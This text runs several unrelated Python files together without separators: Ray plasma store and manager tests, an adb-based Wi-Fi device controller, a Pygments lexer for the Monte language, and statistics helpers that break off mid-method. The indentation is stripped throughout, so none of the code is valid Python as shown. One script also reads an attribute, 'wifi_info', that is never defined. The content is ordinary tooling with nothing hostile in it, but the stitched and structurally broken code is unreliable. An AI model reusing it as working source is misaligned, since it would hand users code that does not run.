from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from numpy.testing import assert_equal
import os
import random
import signal
import subprocess
import sys
import threading
import time
import unittest
# The ray import must come before the pyarrow import because ray modifies the
# python path so that the right version of pyarrow is found.
import ray
from ray.plasma.utils import (random_object_id,
create_object_with_id, create_object)
from ray import services
import pyarrow as pa
import pyarrow.plasma as plasma
USE_VALGRIND = False
PLASMA_STORE_MEMORY = 1000000000
def random_name():
return str(random.randint(0, 99999999))
def assert_get_object_equal(unit_test, client1, client2, object_id,
memory_buffer=None, metadata=None):
client1_buff = client1.get_buffers([object_id])[0]
client2_buff = client2.get_buffers([object_id])[0]
client1_metadata = client1.get_metadata([object_id])[0]
client2_metadata = client2.get_metadata([object_id])[0]
unit_test.assertEqual(len(client1_buff), len(client2_buff))
unit_test.assertEqual(len(client1_metadata), len(client2_metadata))
# Check that the buffers from the two clients are the same.
assert_equal(np.frombuffer(client1_buff, dtype="uint8"),
np.frombuffer(client2_buff, dtype="uint8"))
# Check that the metadata buffers from the two clients are the same.
assert_equal(np.frombuffer(client1_metadata, dtype="uint8"),
np.frombuffer(client2_metadata, dtype="uint8"))
# If a reference buffer was provided, check that it is the same as well.
if memory_buffer is not None:
assert_equal(np.frombuffer(memory_buffer, dtype="uint8"),
np.frombuffer(client1_buff, dtype="uint8"))
# If reference metadata was provided, check that it is the same as well.
if metadata is not None:
assert_equal(np.frombuffer(metadata, dtype="uint8"),
np.frombuffer(client1_metadata, dtype="uint8"))
DEFAULT_PLASMA_STORE_MEMORY = 10 ** 9
def start_plasma_store(plasma_store_memory=DEFAULT_PLASMA_STORE_MEMORY,
use_valgrind=False, use_profiler=False,
stdout_file=None, stderr_file=None):
"""Start a plasma store process.
Args:
use_valgrind (bool): True if the plasma store should be started inside
of valgrind. If this is True, use_profiler must be False.
use_profiler (bool): True if the plasma store should be started inside
a profiler. If this is True, use_valgrind must be False.
stdout_file: A file handle opened for writing to redirect stdout to. If
no redirection should happen, then this should be None.
stderr_file: A file handle opened for writing to redirect stderr to. If
no redirection should happen, then this should be None.
Return:
A tuple of the name of the plasma store socket and the process ID of
the plasma store process.
"""
if use_valgrind and use_profiler:
raise Exception("Cannot use valgrind and profiler at the same time.")
plasma_store_executable = os.path.join(pa.__path__[0], "plasma_store")
plasma_store_name = "/tmp/plasma_store{}".format(random_name())
command = [plasma_store_executable,
"-s", plasma_store_name,
"-m", str(plasma_store_memory)]
if use_valgrind:
pid = subprocess.Popen(["valgrind",
"--track-origins=yes",
"--leak-check=full",
"--show-leak-kinds=all",
"--leak-check-heuristics=stdstring",
"--error-exitcode=1"] + command,
stdout=stdout_file, stderr=stderr_file)
time.sleep(1.0)
elif use_profiler:
pid = subprocess.Popen(["valgrind", "--tool=callgrind"] + command,
stdout=stdout_file, stderr=stderr_file)
time.sleep(1.0)
else:
pid = subprocess.Popen(command, stdout=stdout_file, stderr=stderr_file)
time.sleep(0.1)
return plasma_store_name, pid
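# A minimal standalone sketch (not used by the tests below) of how
# start_plasma_store might be exercised on its own: start a store, connect a
# client directly through pyarrow.plasma, create and seal an object, and shut
# the store down. The memory size and the empty manager socket name are
# illustrative assumptions.
def _example_standalone_store():  # pragma: no cover
    store_name, proc = start_plasma_store(plasma_store_memory=10 ** 8)
    try:
        client = plasma.connect(store_name, "", 64)
        object_id = random_object_id()
        client.create(object_id, 100)  # allocate a 100-byte buffer
        client.seal(object_id)
        return client.contains(object_id)  # expected: True
    finally:
        proc.kill()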
# Plasma client tests were moved into arrow
class TestPlasmaManager(unittest.TestCase):
def setUp(self):
# Start two PlasmaStores.
store_name1, self.p2 = start_plasma_store(
use_valgrind=USE_VALGRIND)
store_name2, self.p3 = start_plasma_store(
use_valgrind=USE_VALGRIND)
# Start a Redis server.
redis_address, _ = services.start_redis("127.0.0.1")
# Start two PlasmaManagers.
manager_name1, self.p4, self.port1 = ray.plasma.start_plasma_manager(
store_name1, redis_address, use_valgrind=USE_VALGRIND)
manager_name2, self.p5, self.port2 = ray.plasma.start_plasma_manager(
store_name2, redis_address, use_valgrind=USE_VALGRIND)
# Connect two PlasmaClients.
self.client1 = plasma.connect(store_name1, manager_name1, 64)
self.client2 = plasma.connect(store_name2, manager_name2, 64)
# Store the processes that will be explicitly killed during tearDown so
# that a test case can remove ones that will be killed during the test.
# NOTE: If this specific order is changed, valgrind will fail.
self.processes_to_kill = [self.p4, self.p5, self.p2, self.p3]
def tearDown(self):
# Check that the processes are still alive.
for process in self.processes_to_kill:
self.assertEqual(process.poll(), None)
# Kill the Plasma store and Plasma manager processes.
if USE_VALGRIND:
# Give processes opportunity to finish work.
time.sleep(1)
for process in self.processes_to_kill:
process.send_signal(signal.SIGTERM)
process.wait()
if process.returncode != 0:
print("aborting due to valgrind error")
os._exit(-1)
else:
for process in self.processes_to_kill:
process.kill()
# Clean up the Redis server.
services.cleanup()
def test_fetch(self):
for _ in range(10):
# Create an object.
object_id1, memory_buffer1, metadata1 = create_object(self.client1,
2000,
2000)
self.client1.fetch([object_id1])
self.assertEqual(self.client1.contains(object_id1), True)
self.assertEqual(self.client2.contains(object_id1), False)
# Fetch the object from the other plasma manager.
# TODO(rkn): Right now we must wait for the object table to be
# updated.
while not self.client2.contains(object_id1):
self.client2.fetch([object_id1])
# Compare the two buffers.
assert_get_object_equal(self, self.client1, self.client2,
object_id1,
memory_buffer=memory_buffer1,
metadata=metadata1)
# Test that we can call fetch on object IDs that don't exist yet.
object_id2 = random_object_id()
self.client1.fetch([object_id2])
self.assertEqual(self.client1.contains(object_id2), False)
memory_buffer2, metadata2 = create_object_with_id(self.client2,
object_id2,
2000, 2000)
# # Check that the object has been fetched.
# self.assertEqual(self.client1.contains(object_id2), True)
# Compare the two buffers.
# assert_get_object_equal(self, self.client1, self.client2, object_id2,
# memory_buffer=memory_buffer2,
# metadata=metadata2)
# Test calling the same fetch request a bunch of times.
object_id3 = random_object_id()
self.assertEqual(self.client1.contains(object_id3), False)
self.assertEqual(self.client2.contains(object_id3), False)
for _ in range(10):
self.client1.fetch([object_id3])
self.client2.fetch([object_id3])
memory_buffer3, metadata3 = create_object_with_id(self.client1,
object_id3,
2000, 2000)
for _ in range(10):
self.client1.fetch([object_id3])
self.client2.fetch([object_id3])
# TODO(rkn): Right now we must wait for the object table to be updated.
while not self.client2.contains(object_id3):
self.client2.fetch([object_id3])
assert_get_object_equal(self, self.client1, self.client2, object_id3,
memory_buffer=memory_buffer3,
metadata=metadata3)
def test_fetch_multiple(self):
for _ in range(20):
# Create two objects and a third fake one that doesn't exist.
object_id1, memory_buffer1, metadata1 = create_object(self.client1,
2000,
2000)
missing_object_id = random_object_id()
object_id2, memory_buffer2, metadata2 = create_object(self.client1,
2000,
2000)
object_ids = [object_id1, missing_object_id, object_id2]
            # Fetch the objects from the other plasma store. The second object
            # ID should time out since it does not exist.
# TODO(rkn): Right now we must wait for the object table to be
# updated.
while ((not self.client2.contains(object_id1)) or
(not self.client2.contains(object_id2))):
self.client2.fetch(object_ids)
# Compare the buffers of the objects that do exist.
assert_get_object_equal(self, self.client1, self.client2,
object_id1, memory_buffer=memory_buffer1,
metadata=metadata1)
assert_get_object_equal(self, self.client1, self.client2,
object_id2, memory_buffer=memory_buffer2,
metadata=metadata2)
# Fetch in the other direction. The fake object still does not
# exist.
self.client1.fetch(object_ids)
assert_get_object_equal(self, self.client2, self.client1,
object_id1, memory_buffer=memory_buffer1,
metadata=metadata1)
assert_get_object_equal(self, self.client2, self.client1,
object_id2, memory_buffer=memory_buffer2,
metadata=metadata2)
# Check that we can call fetch with duplicated object IDs.
object_id3 = random_object_id()
self.client1.fetch([object_id3, object_id3])
object_id4, memory_buffer4, metadata4 = create_object(self.client1,
2000,
2000)
time.sleep(0.1)
# TODO(rkn): Right now we must wait for the object table to be updated.
while not self.client2.contains(object_id4):
self.client2.fetch([object_id3, object_id3, object_id4,
object_id4])
assert_get_object_equal(self, self.client2, self.client1, object_id4,
memory_buffer=memory_buffer4,
metadata=metadata4)
def test_wait(self):
# Test timeout.
obj_id0 = random_object_id()
self.client1.wait([obj_id0], timeout=100, num_returns=1)
# If we get here, the test worked.
# Test wait if local objects available.
obj_id1 = random_object_id()
self.client1.create(obj_id1, 1000)
self.client1.seal(obj_id1)
ready, waiting = self.client1.wait([obj_id1], timeout=100,
num_returns=1)
self.assertEqual(set(ready), set([obj_id1]))
self.assertEqual(waiting, [])
# Test wait if only one object available and only one object waited
# for.
obj_id2 = random_object_id()
self.client1.create(obj_id2, 1000)
# Don't seal.
ready, waiting = self.client1.wait([obj_id2, obj_id1], timeout=100,
num_returns=1)
self.assertEqual(set(ready), set([obj_id1]))
self.assertEqual(set(waiting), set([obj_id2]))
# Test wait if object is sealed later.
obj_id3 = random_object_id()
def finish():
self.client2.create(obj_id3, 1000)
self.client2.seal(obj_id3)
t = threading.Timer(0.1, finish)
t.start()
ready, waiting = self.client1.wait([obj_id3, obj_id2, obj_id1],
timeout=1000, num_returns=2)
self.assertEqual(set(ready), set([obj_id1, obj_id3]))
self.assertEqual(set(waiting), set([obj_id2]))
# Test if the appropriate number of objects is shown if some objects
# are not ready.
ready, waiting = self.client1.wait([obj_id3, obj_id2, obj_id1], 100, 3)
self.assertEqual(set(ready), set([obj_id1, obj_id3]))
self.assertEqual(set(waiting), set([obj_id2]))
# Don't forget to seal obj_id2.
self.client1.seal(obj_id2)
# Test calling wait a bunch of times.
object_ids = []
        # TODO(rkn): Increasing n to 100 (or larger) will cause failures. The
        # problem appears to be that the number of timers added to the manager
        # event loop slows down the manager so much that some of the
        # asynchronous Redis commands time out, triggering fatal failure
        # callbacks.
n = 40
for i in range(n * (n + 1) // 2):
if i % 2 == 0:
object_id, _, _ = create_object(self.client1, 200, 200)
else:
object_id, _, _ = create_object(self.client2, 200, 200)
object_ids.append(object_id)
# Try waiting for all of the object IDs on the first client.
waiting = object_ids
retrieved = []
for i in range(1, n + 1):
ready, waiting = self.client1.wait(waiting, timeout=1000,
num_returns=i)
self.assertEqual(len(ready), i)
retrieved += ready
self.assertEqual(set(retrieved), set(object_ids))
ready, waiting = self.client1.wait(object_ids, timeout=1000,
num_returns=len(object_ids))
self.assertEqual(set(ready), set(object_ids))
self.assertEqual(waiting, [])
# Try waiting for all of the object IDs on the second client.
waiting = object_ids
retrieved = []
for i in range(1, n + 1):
ready, waiting = self.client2.wait(waiting, timeout=1000,
num_returns=i)
self.assertEqual(len(ready), i)
retrieved += ready
self.assertEqual(set(retrieved), set(object_ids))
ready, waiting = self.client2.wait(object_ids, timeout=1000,
num_returns=len(object_ids))
self.assertEqual(set(ready), set(object_ids))
self.assertEqual(waiting, [])
# Make sure that wait returns when the requested number of object IDs
# are available and does not wait for all object IDs to be available.
object_ids = [random_object_id() for _ in range(9)] + \
[plasma.ObjectID(20 * b'\x00')]
object_ids_perm = object_ids[:]
random.shuffle(object_ids_perm)
for i in range(10):
if i % 2 == 0:
create_object_with_id(self.client1, object_ids_perm[i], 2000,
2000)
else:
create_object_with_id(self.client2, object_ids_perm[i], 2000,
2000)
ready, waiting = self.client1.wait(object_ids, num_returns=(i + 1))
self.assertEqual(set(ready), set(object_ids_perm[:(i + 1)]))
self.assertEqual(set(waiting), set(object_ids_perm[(i + 1):]))
def test_transfer(self):
num_attempts = 100
for _ in range(100):
# Create an object.
object_id1, memory_buffer1, metadata1 = create_object(self.client1,
2000,
2000)
            # Transfer the buffer to the other Plasma store. There is a
# race condition on the create and transfer of the object, so keep
# trying until the object appears on the second Plasma store.
for i in range(num_attempts):
self.client1.transfer("127.0.0.1", self.port2, object_id1)
buff = self.client2.get_buffers(
[object_id1], timeout_ms=100)[0]
if buff is not None:
break
self.assertNotEqual(buff, None)
del buff
# Compare the two buffers.
assert_get_object_equal(self, self.client1, self.client2,
object_id1, memory_buffer=memory_buffer1,
metadata=metadata1)
# # Transfer the buffer again.
# self.client1.transfer("127.0.0.1", self.port2, object_id1)
# # Compare the two buffers.
# assert_get_object_equal(self, self.client1, self.client2,
# object_id1,
# memory_buffer=memory_buffer1,
# metadata=metadata1)
# Create an object.
object_id2, memory_buffer2, metadata2 = create_object(self.client2,
20000, 20000)
            # Transfer the buffer to the other Plasma store. There is a
# race condition on the create and transfer of the object, so keep
# trying until the object appears on the second Plasma store.
for i in range(num_attempts):
self.client2.transfer("127.0.0.1", self.port1, object_id2)
buff = self.client1.get_buffers(
[object_id2], timeout_ms=100)[0]
if buff is not None:
break
self.assertNotEqual(buff, None)
del buff
# Compare the two buffers.
assert_get_object_equal(self, self.client1, self.client2,
object_id2, memory_buffer=memory_buffer2,
metadata=metadata2)
def test_illegal_functionality(self):
# Create an object id string.
# object_id = random_object_id()
# Create a new buffer.
# memory_buffer = self.client1.create(object_id, 20000)
# This test is commented out because it currently fails.
# # Transferring the buffer before sealing it should fail.
# self.assertRaises(Exception,
# lambda : self.manager1.transfer(1, object_id))
pass
def test_stresstest(self):
a = time.time()
object_ids = []
for i in range(10000): # TODO(pcm): increase this to 100000.
object_id = random_object_id()
object_ids.append(object_id)
self.client1.create(object_id, 1)
self.client1.seal(object_id)
for object_id in object_ids:
self.client1.transfer("127.0.0.1", self.port2, object_id)
b = time.time() - a
print("it took", b, "seconds to put and transfer the objects")
class TestPlasmaManagerRecovery(unittest.TestCase):
def setUp(self):
# Start a Plasma store.
self.store_name, self.p2 = start_plasma_store(
use_valgrind=USE_VALGRIND)
# Start a Redis server.
self.redis_address, _ = services.start_redis("127.0.0.1")
        # Start a PlasmaManager.
manager_name, self.p3, self.port1 = ray.plasma.start_plasma_manager(
self.store_name,
self.redis_address,
use_valgrind=USE_VALGRIND)
# Connect a PlasmaClient.
self.client = plasma.connect(self.store_name, manager_name, 64)
# Store the processes that will be explicitly killed during tearDown so
# that a test case can remove ones that will be killed during the test.
# NOTE: The plasma managers must be killed before the plasma store
# since plasma store death will bring down the managers.
self.processes_to_kill = [self.p3, self.p2]
def tearDown(self):
# Check that the processes are still alive.
for process in self.processes_to_kill:
self.assertEqual(process.poll(), None)
# Kill the Plasma store and Plasma manager processes.
if USE_VALGRIND:
# Give processes opportunity to finish work.
time.sleep(1)
for process in self.processes_to_kill:
process.send_signal(signal.SIGTERM)
process.wait()
if process.returncode != 0:
print("aborting due to valgrind error")
os._exit(-1)
else:
for process in self.processes_to_kill:
process.kill()
# Clean up the Redis server.
services.cleanup()
def test_delayed_start(self):
num_objects = 10
# Create some objects using one client.
object_ids = [random_object_id() for _ in range(num_objects)]
for i in range(10):
create_object_with_id(self.client, object_ids[i], 2000, 2000)
# Wait until the objects have been sealed in the store.
ready, waiting = self.client.wait(object_ids, num_returns=num_objects)
self.assertEqual(set(ready), set(object_ids))
self.assertEqual(waiting, [])
# Start a second plasma manager attached to the same store.
manager_name, self.p5, self.port2 = ray.plasma.start_plasma_manager(
self.store_name, self.redis_address, use_valgrind=USE_VALGRIND)
self.processes_to_kill = [self.p5] + self.processes_to_kill
# Check that the second manager knows about existing objects.
client2 = plasma.connect(self.store_name, manager_name, 64)
ready, waiting = [], object_ids
while True:
ready, waiting = client2.wait(object_ids, num_returns=num_objects,
timeout=0)
if len(ready) == len(object_ids):
break
self.assertEqual(set(ready), set(object_ids))
self.assertEqual(waiting, [])
if __name__ == "__main__":
if len(sys.argv) > 1:
# Pop the argument so we don't mess with unittest's own argument
# parser.
if sys.argv[-1] == "valgrind":
arg = sys.argv.pop()
USE_VALGRIND = True
print("Using valgrind for tests")
unittest.main(verbosity=2)
from apetools.baseclass import BaseClass
from basedevice import BaseDevice
from apetools.connections.adbconnection import ADBShellConnection
from apetools.commands.svc import Svc
from apetools.commands.netcfg import NetcfgCommand
from apetools.commands.iwcommand import IwCommand
from apetools.commands.wlcommand import WlCommand
from apetools.commands.wificommand import WifiCommand
from apetools.commands.wpacli import WpaCliCommand
from apetools.commons.errors import CommandError
commands = {"iw":IwCommand,
'wl':WlCommand,
'wifi':WifiCommand,
'wpa_cli':WpaCliCommand}
class AdbDevice(BaseDevice):
"""
A class to bundle commands to control an adb device
"""
def __init__(self, *args, **kwargs):
"""
:param:
        - `connection`: A device connection
"""
super(AdbDevice, self).__init__(*args, **kwargs)
self._wifi_control = None
self._wifi_querier = None
self._netcfg = None
self._wifi_commands = None
return
@property
def channel(self):
"""
:return: the channel for the current wifi connection
"""
return self.wifi_querier.channel
@property
def rssi(self):
"""
:return: the current RSSI
"""
return self.wifi_querier.rssi
@property
def bitrate(self):
"""
:return: the current bitrate
"""
return self.wifi_querier.bitrate
@property
def noise(self):
"""
:return: the current noise
"""
return self.wifi_querier.noise
@property
def ssid(self):
"""
:return: the ssid of the attached AP
"""
        return self.wifi_querier.ssid
@property
def bssid(self):
"""
:return: the MAC address of the attached AP
"""
        return self.wifi_querier.bssid
@property
def mac_address(self):
"""
        :return: the device's mac address
"""
if self._mac_address is None:
if "wpa_cli" in self.wifi_commands:
self._mac_address = commands['wpa_cli'](connection=self.connection,
interface=self.interface).mac_address
else:
self._mac_address = self.wifi_querier.mac_address
return self._mac_address
@property
def wifi_commands(self):
"""
:return: list of available wifi commands
"""
if self._wifi_commands is None:
self._wifi_commands = AdbWifiCommandFinder()(self.connection)
return self._wifi_commands
@property
def wifi_querier(self):
"""
:return: command to query wifi information
"""
if self._wifi_querier is None:
self._wifi_querier = commands[self.wifi_commands[0]](connection=self.connection,
interface=self.interface)
return self._wifi_querier
@property
def netcfg(self):
"""
:return: NetcfgCommand
"""
if self._netcfg is None:
self._netcfg = NetcfgCommand(self.connection,
self.interface)
return self._netcfg
@property
def wifi_control(self):
"""
:return: Svc command (enable disable radio)
"""
if self._wifi_control is None:
self._wifi_control = Svc(connection=self.connection)
return self._wifi_control
@property
def connection(self):
"""
:return: connection passed in or ADBShellConnection if not given
"""
if self._connection is None:
self._connection = ADBShellConnection()
return self._connection
def wake_screen(self):
"""
Wake the screen
"""
raise NotImplementedError("Wake Screen not ready yet")
return
def display(self, message):
"""
Display a message on the screen
"""
raise NotImplementedError("Display <message> not done yet")
return
def disable_wifi(self):
"""
:postcondition: WiFi radio disabled
"""
self.wifi_control.disable_wifi()
return
def enable_wifi(self):
"""
:postcondition: WiFi radio enabled
"""
self.wifi_control.enable_wifi()
return
def get_wifi_info(self):
"""
:rtype: StringType
:return: The Wifi Info
"""
return "SSID:{0}\nBSSID:{1}\nMAC:{2}\nChannel:{3}\nIP:{4}\nRSSI:{5}\nNoise:{6}\nBitrate:{7}".format(self.ssid,
self.bssid,
self.mac_address,
self.channel,
self.ip_address,
self.rssi,
self.noise,
self.bitrate)
def log(self, message):
"""
:postcondition: message sent to the connection
"""
self.connection.log(message)
return
def root(self):
"""
:postcondition: `su` sent to the device
"""
self.connection.su(timeout=1)
return
@property
def address(self):
"""
:return: ip address of interface
"""
return self.netcfg.ip_address
# end class AdbDevice
# commands to try, in order of preference
wifi_commands = "wifi wl iw wpa_cli".split()
class AdbWifiCommandFinder(BaseClass):
"""
A finder of the main wifi command.
"""
def __call__(self, connection):
"""
:param:
- `connection`: An ADB Connection to the device
:return: string identifier of primary wifi query command
"""
super(AdbWifiCommandFinder, self).__init__()
commands = []
for command in wifi_commands:
valid = True
try:
with connection.lock:
output, error = getattr(connection, command)("-v")
for line in output:
if "not found" in line:
valid = False
break
if valid:
commands.append(command)
except CommandError as error:
self.logger.debug(error)
return commands
# end class AdbWifiCommandFinder
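# A minimal usage sketch, assuming a reachable adb device. The finder is
# normally used indirectly through AdbDevice.wifi_commands, but it can also be
# called directly with a connection to list the wifi tools on the device:
#
#    finder = AdbWifiCommandFinder()
#    available = finder(ADBShellConnection())
#    # e.g. ['wifi', 'wpa_cli'] -- the first entry selects the querier class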
if __name__ == "__main__":
from apetools.connections.adbconnection import ADBShellSSHConnection
import sys
c = ADBShellSSHConnection(hostname="lancet", username="allion")
a = AdbDevice(connection = c, interface="wlan0", csv=True)
sys.stdout.write(a.wifi_info)
sys.stdout.write(a.wifi_info)
# -*- coding: utf-8 -*-
"""
pygments.lexers.monte
~~~~~~~~~~~~~~~~~~~~~
Lexer for the Monte programming language.
:copyright: Copyright 2016 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.token import Comment, Error, Keyword, Name, Number, Operator, \
Punctuation, String, Whitespace
from pygments.lexer import RegexLexer, include, words
__all__ = ['MonteLexer']
# `var` handled separately
# `interface` handled separately
_declarations = ['bind', 'def', 'fn', 'object']
_methods = ['method', 'to']
_keywords = [
'as', 'break', 'catch', 'continue', 'else', 'escape', 'exit', 'exports',
'extends', 'finally', 'for', 'guards', 'if', 'implements', 'import',
'in', 'match', 'meta', 'pass', 'return', 'switch', 'try', 'via', 'when',
'while',
]
_operators = [
# Unary
'~', '!',
# Binary
'+', '-', '*', '/', '%', '**', '&', '|', '^', '<<', '>>',
# Binary augmented
'+=', '-=', '*=', '/=', '%=', '**=', '&=', '|=', '^=', '<<=', '>>=',
# Comparison
'==', '!=', '<', '<=', '>', '>=', '<=>',
# Patterns and assignment
':=', '?', '=~', '!~', '=>',
# Calls and sends
'.', '<-', '->',
]
_escape_pattern = (
r'(?:\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}|\\U[0-9a-fA-F]{8}|'
r'\\["\'\\bftnr])')
#_char = _escape_chars + [('.', String.Char)]
_identifier = '[_a-zA-Z][_0-9a-zA-Z]*'
_constants = [
# Void constants
'null',
# Bool constants
'false', 'true',
# Double constants
'Infinity', 'NaN',
# Special objects
'M', 'Ref', 'throw', 'traceln',
]
_guards = [
'Any', 'Binding', 'Bool', 'Bytes', 'Char', 'DeepFrozen', 'Double',
'Empty', 'Int', 'List', 'Map', 'Near', 'NullOk', 'Same', 'Selfless',
'Set', 'Str', 'SubrangeGuard', 'Transparent', 'Void',
]
_safeScope = [
'_accumulateList', '_accumulateMap', '_auditedBy', '_bind',
'_booleanFlow', '_comparer', '_equalizer', '_iterForever', '_loop',
'_makeBytes', '_makeDouble', '_makeFinalSlot', '_makeInt', '_makeList',
'_makeMap', '_makeMessageDesc', '_makeOrderedSpace', '_makeParamDesc',
'_makeProtocolDesc', '_makeSourceSpan', '_makeString', '_makeVarSlot',
'_makeVerbFacet', '_mapExtract', '_matchSame', '_quasiMatcher',
'_slotToBinding', '_splitList', '_suchThat', '_switchFailed',
'_validateFor', 'b__quasiParser', 'eval', 'import', 'm__quasiParser',
'makeBrandPair', 'makeLazySlot', 'safeScope', 'simple__quasiParser',
]
class MonteLexer(RegexLexer):
"""
Lexer for the `Monte <https://monte.readthedocs.io/>`_ programming language.
.. versionadded:: 2.2
"""
name = 'Monte'
aliases = ['monte']
filenames = ['*.mt']
tokens = {
'root': [
# Comments
(r'#[^\n]*\n', Comment),
# Docstrings
# Apologies for the non-greedy matcher here.
(r'/\*\*.*?\*/', String.Doc),
# `var` declarations
(r'\bvar\b', Keyword.Declaration, 'var'),
# `interface` declarations
(r'\binterface\b', Keyword.Declaration, 'interface'),
# method declarations
(words(_methods, prefix='\\b', suffix='\\b'),
Keyword, 'method'),
# All other declarations
(words(_declarations, prefix='\\b', suffix='\\b'),
Keyword.Declaration),
# Keywords
(words(_keywords, prefix='\\b', suffix='\\b'), Keyword),
# Literals
('[+-]?0x[_0-9a-fA-F]+', Number.Hex),
(r'[+-]?[_0-9]+\.[_0-9]*([eE][+-]?[_0-9]+)?', Number.Float),
('[+-]?[_0-9]+', Number.Integer),
("'", String.Double, 'char'),
('"', String.Double, 'string'),
# Quasiliterals
('`', String.Backtick, 'ql'),
# Operators
(words(_operators), Operator),
# Verb operators
(_identifier + '=', Operator.Word),
# Safe scope constants
(words(_constants, prefix='\\b', suffix='\\b'),
Keyword.Pseudo),
# Safe scope guards
(words(_guards, prefix='\\b', suffix='\\b'), Keyword.Type),
# All other safe scope names
(words(_safeScope, prefix='\\b', suffix='\\b'),
Name.Builtin),
# Identifiers
(_identifier, Name),
# Punctuation
(r'\(|\)|\{|\}|\[|\]|:|,', Punctuation),
# Whitespace
(' +', Whitespace),
# Definite lexer errors
('=', Error),
],
'char': [
# It is definitely an error to have a char of width == 0.
("'", Error, 'root'),
(_escape_pattern, String.Escape, 'charEnd'),
('.', String.Char, 'charEnd'),
],
'charEnd': [
("'", String.Char, '#pop:2'),
# It is definitely an error to have a char of width > 1.
('.', Error),
],
# The state of things coming into an interface.
'interface': [
(' +', Whitespace),
(_identifier, Name.Class, '#pop'),
include('root'),
],
# The state of things coming into a method.
'method': [
(' +', Whitespace),
(_identifier, Name.Function, '#pop'),
include('root'),
],
'string': [
('"', String.Double, 'root'),
(_escape_pattern, String.Escape),
(r'\n', String.Double),
('.', String.Double),
],
'ql': [
('`', String.Backtick, 'root'),
(r'\$' + _escape_pattern, String.Escape),
(r'\$\$', String.Escape),
(r'@@', String.Escape),
(r'\$\{', String.Interpol, 'qlNest'),
(r'@\{', String.Interpol, 'qlNest'),
(r'\$' + _identifier, Name),
('@' + _identifier, Name),
('.', String.Backtick),
],
'qlNest': [
(r'\}', String.Interpol, '#pop'),
include('root'),
],
# The state of things immediately following `var`.
'var': [
(' +', Whitespace),
(_identifier, Name.Variable, '#pop'),
include('root'),
],
}
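# A minimal sketch of running this lexer through the standard Pygments API
# (the Monte snippet is illustrative):
#
#    from pygments import highlight
#    from pygments.formatters import TerminalFormatter
#    code = 'def greet(name) :Str { return `Hello, $name` }'
#    print(highlight(code, MonteLexer(), TerminalFormatter()))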
"""This module contains utilities for methods."""
import logging
from math import ceil
from typing import Dict, List, Optional, Union
import numpy as np
import scipy.stats as ss
logger = logging.getLogger(__name__)
def arr2d_to_batch(x, names):
"""Convert a 2d array to a batch dictionary columnwise.
Parameters
----------
x : np.ndarray
2d array of values
names : list[str]
List of names
Returns
-------
dict
A batch dictionary
"""
# TODO: support vector parameter nodes
    try:
        x = x.reshape((-1, len(names)))
    except Exception as exc:
        raise ValueError("A dimension mismatch in converting array to batch dictionary. "
                         "This may be caused by multidimensional "
                         "prior nodes that are not yet supported.") from exc
batch = {p: x[:, i] for i, p in enumerate(names)}
return batch
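# Illustrative example (values are arbitrary): a (3, 2) array with names
# ['a', 'b'] becomes {'a': array([1., 3., 5.]), 'b': array([2., 4., 6.])};
# batch_to_arr2d below performs the inverse mapping.
#
#    arr2d_to_batch(np.array([[1., 2.], [3., 4.], [5., 6.]]), ['a', 'b'])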
def batch_to_arr2d(batches, names):
"""Convert batches into a single numpy array.
Parameters
----------
batches : dict or list
A list of batches or a single batch
names : list
Name of outputs to include in the array. Specifies the order.
Returns
-------
np.array
2d, where columns are batch outputs
"""
if not batches:
return []
if not isinstance(batches, list):
batches = [batches]
rows = []
for batch_ in batches:
rows.append(np.column_stack([batch_[n] for n in names]))
return np.vstack(rows)
def ceil_to_batch_size(num, batch_size):
"""Calculate how many full batches in num.
Parameters
----------
num : int
batch_size : int
"""
return int(batch_size * ceil(num / batch_size))
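# Illustrative example: with batch_size=10, num=23 is rounded up to 30, and an
# exact multiple is returned unchanged (ceil_to_batch_size(30, 10) == 30).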
def normalize_weights(weights):
"""Normalize weights to sum to unity."""
w = np.atleast_1d(weights)
    if np.any(w < 0):
        raise ValueError("Weights must be non-negative")
    wsum = np.sum(w)
if wsum == 0:
raise ValueError("All weights are zero")
return w / wsum
def compute_ess(weights: Union[None, np.ndarray] = None):
"""Compute the Effective Sample Size (ESS). Weights are assumed to be unnormalized.
Parameters
----------
weights: unnormalized weights
"""
# normalize weights
weights = normalize_weights(weights)
# compute ESS
numer = np.square(np.sum(weights))
denom = np.sum(np.square(weights))
return numer / denom
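# Illustrative example: equal weights give an ESS equal to the sample size,
# while a single dominating weight pushes the ESS towards 1.
#
#    compute_ess(np.ones(10))                   # -> 10.0
#    compute_ess(np.array([5.0, 1e-6, 1e-6]))   # -> approximately 1.0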
def weighted_var(x, weights=None):
"""Unbiased weighted variance (sample variance) for the components of x.
The weights are assumed to be non random (reliability weights).
Parameters
----------
x : np.ndarray
1d or 2d with observations in rows
weights : np.ndarray or None
1d array of weights. None defaults to standard variance.
Returns
-------
s2 : np.array
1d vector of component variances
References
----------
[1] https://en.wikipedia.org/wiki/Weighted_arithmetic_mean#Weighted_sample_variance
"""
if weights is None:
weights = np.ones(len(x))
V_1 = np.sum(weights)
V_2 = np.sum(weights ** 2)
xbar = np.average(x, weights=weights, axis=0)
numerator = weights.dot((x - xbar) ** 2)
s2 = numerator / (V_1 - (V_2 / V_1))
return s2
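# Illustrative check: with equal (or omitted) weights this reduces to the
# unbiased sample variance, i.e. weighted_var(x) matches np.var(x, axis=0, ddof=1).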
class GMDistribution:
"""Gaussian mixture distribution with a shared covariance matrix."""
@classmethod
def pdf(cls, x, means, cov=1, weights=None):
"""Evaluate the density at points x.
Parameters
----------
x : array_like
Scalar, 1d or 2d array of points where to evaluate, observations in rows
means : array_like
Means of the Gaussian mixture components. It is assumed that means[0] contains
the mean of the first gaussian component.
weights : array_like
1d array of weights of the gaussian mixture components
cov : array_like, float
A shared covariance matrix for the mixture components
"""
means, weights = cls._normalize_params(means, weights)
ndim = np.asanyarray(x).ndim
if means.ndim == 1:
x = np.atleast_1d(x)
if means.ndim == 2:
x = np.atleast_2d(x)
d = np.zeros(len(x))
for m, w in zip(means, weights):
d += w * ss.multivariate_normal.pdf(x, mean=m, cov=cov)
# Cast to correct ndim
if ndim == 0 or (ndim == 1 and means.ndim == 2):
return d.squeeze()
else:
return d
@classmethod
def logpdf(cls, x, means, cov=1, weights=None):
"""Evaluate the log density at points x.
Parameters
----------
x : array_like
Scalar, 1d or 2d array of points where to evaluate, observations in rows
means : array_like
Means of the Gaussian mixture components. It is assumed that means[0] contains
the mean of the first gaussian component.
weights : array_like
1d array of weights of the gaussian mixture components
cov : array_like, float
A shared covariance matrix for the mixture components
"""
